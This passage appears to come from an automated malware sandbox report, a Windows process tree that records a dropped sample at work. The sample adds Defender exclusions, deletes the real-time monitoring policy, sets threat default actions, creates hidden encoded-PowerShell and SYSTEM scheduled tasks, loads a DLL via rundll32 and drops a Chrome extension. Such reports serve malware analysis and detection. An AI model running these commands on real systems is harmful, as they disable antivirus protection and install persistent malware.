                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1392
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1640
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2952
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                            PID:1872
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:64
                                                                                                            4⤵
                                                                                                              PID:1972
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:32
                                                                                                              4⤵
                                                                                                                PID:1528
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                4⤵
                                                                                                                  PID:2044
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                  4⤵
                                                                                                                    PID:1656
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                    4⤵
                                                                                                                      PID:2352
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:1028
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:64
                                                                                                                        4⤵
                                                                                                                          PID:2196
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:32
                                                                                                                          4⤵
                                                                                                                            PID:1440
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:64
                                                                                                                            4⤵
                                                                                                                              PID:2344
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                              4⤵
                                                                                                                                PID:1984
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                4⤵
                                                                                                                                  PID:2612
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                  4⤵
                                                                                                                                    PID:2604
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                    4⤵
                                                                                                                                      PID:1584
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      4⤵
                                                                                                                                        PID:2760
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        4⤵
                                                                                                                                          PID:2948
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          4⤵
                                                                                                                                            PID:2532
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            4⤵
                                                                                                                                              PID:2564
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "gBPMfWJSe" /SC once /ST 00:02:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                            3⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:2908
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /run /I /tn "gBPMfWJSe"
                                                                                                                                            3⤵
                                                                                                                                              PID:2520
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /DELETE /F /TN "gBPMfWJSe"
                                                                                                                                              3⤵
                                                                                                                                                PID:348
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                3⤵
                                                                                                                                                  PID:1052
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1732
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1852
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                        4⤵
                                                                                                                                                          PID:2848
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "WFVPvOFzrjCnPPlbL" /SC once /ST 00:03:28 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\GCZagZc.exe\" 7d /jrOndidpz 525403 /S" /V1 /F
                                                                                                                                                        3⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:288
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /run /I /tn "WFVPvOFzrjCnPPlbL"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2268
                                                                                                                                                      • C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\GCZagZc.exe
                                                                                                                                                        C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\GCZagZc.exe 7d /jrOndidpz 525403 /S
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:1264
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2252
                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:1348
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2940
                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:1664
                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1400
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:1688
                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:1668
                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:796
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:2936
                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:2928
                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:1304
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:1480
                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:908
                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:2348
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:300
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:1360
                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:1860
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "butYHpXTvMdZIJsEKZ"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:1296
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1868
                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:1928
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:1864
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:2152
                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:2044
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:880
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2428
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:1700
                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                              PID:2332
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tffvHWJZU\LfjBod.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "oiGBDDjiIQmhwtu" /V1 /F
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:484
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /CREATE /TN "oiGBDDjiIQmhwtu2" /F /xml "C:\Program Files (x86)\tffvHWJZU\qxflQmv.xml" /RU "SYSTEM"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:1912
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /END /TN "oiGBDDjiIQmhwtu"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:2936
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        schtasks /DELETE /F /TN "oiGBDDjiIQmhwtu"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1480
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "mVOvxPujqogGhF" /F /xml "C:\Program Files (x86)\REeMUtPoCvFU2\kbDmECk.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2260
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "PuKixiXcCNlkt2" /F /xml "C:\ProgramData\NGysLhxJEZNwhMVB\XBQMBSg.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:1564
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "PNkVCGbsoOwbzBvhS2" /F /xml "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\PbWmAcg.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2560
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "OEjxyANCnYwFWrViDzJ2" /F /xml "C:\Program Files (x86)\kLpsRMujXEpbC\xyRgFXV.xml" /RU "SYSTEM"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:332
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /CREATE /TN "dSPsRFCNvoTMekFez" /SC once /ST 00:00:02 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mrYrpJCpOmktZWwz\GwOrTffq\TzDymuw.dll\",#1 /DxdidUrui 525403" /V1 /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                          PID:2064
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /run /I /tn "dSPsRFCNvoTMekFez"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:1772
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /DELETE /F /TN "WFVPvOFzrjCnPPlbL"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:940
                                                                                                                                                                                                          • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\GwOrTffq\TzDymuw.dll",#1 /DxdidUrui 525403
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:2224
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\GwOrTffq\TzDymuw.dll",#1 /DxdidUrui 525403
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                PID:2396
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "dSPsRFCNvoTMekFez"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2896
                                                                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                              taskeng.exe {16F9E64D-073C-4B3B-9446-A301211178BA} S-1-5-21-2737914667-933161113-3798636211-1000:PUMARTNR\Admin:Interactive:[1]
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:824
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:644
                                                                                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1748
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:2600
                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1964
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
